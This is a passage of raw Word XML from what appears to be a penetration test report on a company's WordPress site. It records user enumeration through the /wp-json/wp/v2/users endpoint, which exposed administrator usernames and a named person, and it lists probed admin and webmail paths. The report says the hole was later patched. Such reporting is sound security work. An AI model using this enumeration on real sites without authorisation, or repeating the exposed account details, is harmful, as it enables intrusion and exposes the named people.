        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc40134070"/>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Source Code from the Hidden Directory /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wp-json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="1C3A6768" w14:textId="4ABD02AD" w:rsidR="00C41BC4" w:rsidRDefault="00A71BAB" w:rsidP="00C37364">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Additionally,</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve"> a further hidden directory: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C37364">
        <w:t>wp-json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C37364">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C37364">
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve">/v2/users directory was found within the API source code that led to the backend database users file shown in </w:t>
      </w:r>
      <w:r w:rsidR="00C37364" w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>figure</w:t>
      </w:r>
      <w:r w:rsidRPr="00A71BAB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 6.</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A68714" w14:textId="6FBE1BF6" w:rsidR="00C37364" w:rsidRDefault="00C41BC4" w:rsidP="00C37364">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00124D8C">
        <w:t>directory</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">revealed a file backend </w:t>
      </w:r>
      <w:r w:rsidR="00124D8C">
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user file, containing</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve"> the CEO/CTO website </w:t>
      </w:r>
      <w:r w:rsidR="00124D8C">
        <w:t xml:space="preserve">administrator </w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve">username; techieswp1987 along with the Unique Identifier (UID) of the user within the backend </w:t>
      </w:r>
      <w:r>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve"> which is; </w:t>
      </w:r>
      <w:r w:rsidR="00124D8C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve"> with the name of the user which is; Harish Ramani</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65228195" w14:textId="37471D07" w:rsidR="00C41BC4" w:rsidRDefault="00C37364" w:rsidP="00C37364">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A second user UID was also located within the file which was UID; </w:t>
      </w:r>
      <w:r w:rsidR="00124D8C">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> name; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ramwptest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C41BC4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C877529" w14:textId="787FABBD" w:rsidR="00C37364" w:rsidRPr="00C41BC4" w:rsidRDefault="00C41BC4" w:rsidP="00C41BC4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Due</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve"> to the nature of the sensitive </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve"> found </w:t>
      </w:r>
      <w:r>
        <w:t>and the ease of access to the target website backend</w:t>
      </w:r>
      <w:r w:rsidR="00C37364">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">database </w:t>
      </w:r>
      <w:r w:rsidR="00BE31CC">
        <w:t xml:space="preserve">‘Users’ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">file along with the information regarding the database parent </w:t>
      </w:r>
      <w:r w:rsidR="00B20E07">
        <w:t>structure</w:t>
      </w:r>
      <w:r w:rsidR="00BE31CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B20E07">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00BE31CC">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00B20E07">
        <w:t>provided</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00B20E07">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E72FCF">
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file format</w:t>
      </w:r>
      <w:r w:rsidR="00BE31CC" w:rsidRPr="00BE31CC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE31CC">
        <w:t>previously discussed</w:t>
      </w:r>
      <w:r>
        <w:t>, this vulnerability has been given an ‘</w:t>
      </w:r>
      <w:r w:rsidR="00BE31CC">
        <w:t>extremely</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> high’ rating that should be patched immediately. In accordance with the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>clients</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instructions, this exploit was not </w:t>
      </w:r>
      <w:r w:rsidR="00BE31CC">
        <w:t>pursued</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> any further.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D72CCA8" w14:textId="77777777" w:rsidR="00D73491" w:rsidRDefault="001520A9" w:rsidP="00D73491">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5CFB67" wp14:editId="63EDD8B0">
            <wp:extent cx="5730240" cy="645160"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="215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t="11855" b="70432"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="64516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60F899A5" w14:textId="10D6E779" w:rsidR="001520A9" w:rsidRPr="00D73491" w:rsidRDefault="00D73491" w:rsidP="00D73491">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc40134071"/>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Backend Database Information of the Target Website Found in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wp-json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D73491">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/v2/users Directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="0F3D100C" w14:textId="7B436750" w:rsidR="001520A9" w:rsidRPr="001520A9" w:rsidRDefault="001520A9" w:rsidP="001520A9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001520A9">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The hidden directory vulnerability was subsequently patched by  the network security engineers at </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1"/>
      <w:r w:rsidRPr="001520A9">
        <w:t>‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001520A9">
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001520A9">
        <w:t xml:space="preserve"> Cyber Lt</w:t>
      </w:r>
      <w:r w:rsidR="00252C40">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="001520A9">
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidR="00C41BC4">
        <w:t xml:space="preserve">as it was </w:t>
      </w:r>
      <w:r w:rsidR="00252C40">
        <w:t>unable</w:t>
      </w:r>
      <w:r w:rsidR="00C41BC4">
        <w:t xml:space="preserve"> to be further accessed after the </w:t>
      </w:r>
      <w:r w:rsidR="00252C40">
        <w:t>initial</w:t>
      </w:r>
      <w:r w:rsidR="00C41BC4">
        <w:t xml:space="preserve"> discovery, this is </w:t>
      </w:r>
      <w:r w:rsidRPr="001520A9">
        <w:t xml:space="preserve">shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00921931">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00921931">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00863585" w:rsidRPr="00921931">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00863585" w:rsidRPr="00863585">
        <w:t xml:space="preserve">where a; status: 401 </w:t>
      </w:r>
      <w:r w:rsidR="00037646" w:rsidRPr="00863585">
        <w:t>permissions</w:t>
      </w:r>
      <w:r w:rsidR="00863585" w:rsidRPr="00863585">
        <w:t xml:space="preserve"> and authorisation error message was later displayed</w:t>
      </w:r>
      <w:r w:rsidRPr="00863585">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="001520A9">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E68FA82" w14:textId="77777777" w:rsidR="00921931" w:rsidRDefault="001520A9" w:rsidP="00921931">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00863585">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0813A6EA" wp14:editId="30034E52">
            <wp:extent cx="5731510" cy="284148"/>
            <wp:effectExtent l="19050" t="19050" r="21590" b="209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t="11995" r="36082" b="84099"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="284148"/>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08132FBC" w14:textId="0CA837D9" w:rsidR="00863585" w:rsidRPr="00921931" w:rsidRDefault="00921931" w:rsidP="00921931">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc40134072"/>
      <w:r w:rsidRPr="00921931">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00921931">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00921931">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00921931">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00921931">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00921931">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Webserver Security Hardened by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00921931">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tevel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00921931">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cyber</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="22B21388" w14:textId="6642452A" w:rsidR="000F467B" w:rsidRDefault="00A33E38" w:rsidP="001520A9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidR="00863585" w:rsidRPr="00A33E38">
        <w:t>The website hidden directory security update prevented further investigation into the backend database utilising unsecure hidden directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EFE370" w14:textId="42D5B362" w:rsidR="00C84888" w:rsidRDefault="00A43CED" w:rsidP="00A43CED">
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hidden Director</w:t>
      </w:r>
      <w:r w:rsidR="00502A33">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ies</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:r w:rsidR="001520A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E72FCF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C84888" w:rsidRPr="00C84888">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C84888" w:rsidRPr="00C84888">
        <w:t>securecontrolpanel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C84888" w:rsidRPr="00C84888">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C84888">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C84888" w:rsidRPr="00C84888">
        <w:t>/webmail/blank.html</w:t>
      </w:r>
      <w:r w:rsidR="00C84888">
        <w:t xml:space="preserve">, /webmail/, </w:t>
      </w:r>
      <w:r w:rsidR="00C84888" w:rsidRPr="00C84888">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C84888" w:rsidRPr="00C84888">
        <w:t>securecontrolpanel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C84888" w:rsidRPr="00C84888">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C84888">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C84888">
        <w:t>cpanel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C84888">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F96AA" w14:textId="515DDB4A" w:rsidR="00C84888" w:rsidRDefault="00C84888" w:rsidP="00A43CED">
      <w:r>
        <w:t xml:space="preserve">These directories were securely redirected to a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> application login control panel page</w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:t xml:space="preserve"> shown in </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2" w:rsidRPr="00195EE2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>figure 8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that is </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:t xml:space="preserve">secure and </w:t>
      </w:r>
      <w:r>
        <w:t>not vulnerable to attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4E519F" w14:textId="77777777" w:rsidR="00195EE2" w:rsidRDefault="001520A9" w:rsidP="00195EE2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C6FDD10" wp14:editId="46DA3DE9">
            <wp:extent cx="5730240" cy="3642360"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="152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w="6350">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F50C29D" w14:textId="15BC92E4" w:rsidR="00A43CED" w:rsidRPr="00195EE2" w:rsidRDefault="00195EE2" w:rsidP="00195EE2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc40134073"/>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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cure WordPress User Login Control Panel Found</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="6846E0CB" w14:textId="10D6A5EF" w:rsidR="00A43CED" w:rsidRDefault="00A43CED" w:rsidP="00A43CED">
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden Directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:r w:rsidR="00C84888">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C84888" w:rsidRPr="00C84888">
        <w:t>/mailman/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A88916" w14:textId="60FAF4CA" w:rsidR="00C84888" w:rsidRDefault="00C84888" w:rsidP="00A43CED">
      <w:r>
        <w:t xml:space="preserve">This hidden directory shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> contained an administrator mailbox page that needed user authentication to </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:t>access the E-Mail server</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A33937" w14:textId="77777777" w:rsidR="00C84888" w:rsidRDefault="00C84888" w:rsidP="00A43CED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36920A7C" w14:textId="77777777" w:rsidR="00195EE2" w:rsidRDefault="001520A9" w:rsidP="00195EE2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18CB5367" wp14:editId="60C115CA">
            <wp:extent cx="5730240" cy="1823720"/>
            <wp:effectExtent l="19050" t="19050" r="22860" b="241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9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect b="49930"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730240" cy="182372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4AB200E" w14:textId="44B3BC3D" w:rsidR="007650F9" w:rsidRPr="00195EE2" w:rsidRDefault="00195EE2" w:rsidP="00195EE2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc40134074"/>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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00195EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Secure E-Mail Server Login Hidden Page Found</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="39E8741D" w14:textId="47B03385" w:rsidR="00A43CED" w:rsidRDefault="00A43CED" w:rsidP="00A43CED">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Hidden Directory </w:t>
      </w:r>
      <w:r w:rsidR="00195EE2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43CED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:-</w:t>
      </w:r>
      <w:r w:rsidR="00E50E91">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /robots.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9AE191" w14:textId="07D86272" w:rsidR="00C84888" w:rsidRPr="00C84888" w:rsidRDefault="00C84888" w:rsidP="00A43CED">
      <w:r w:rsidRPr="00C84888">
        <w:t xml:space="preserve">The robots.txt file is a default file utilised within </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">websites that tells website crawlers such as; Google </w:t>
      </w:r>
      <w:r w:rsidR="005703F6">
        <w:t>what links to return on a search engine. The robots.txt file shown in</w:t>
      </w:r>
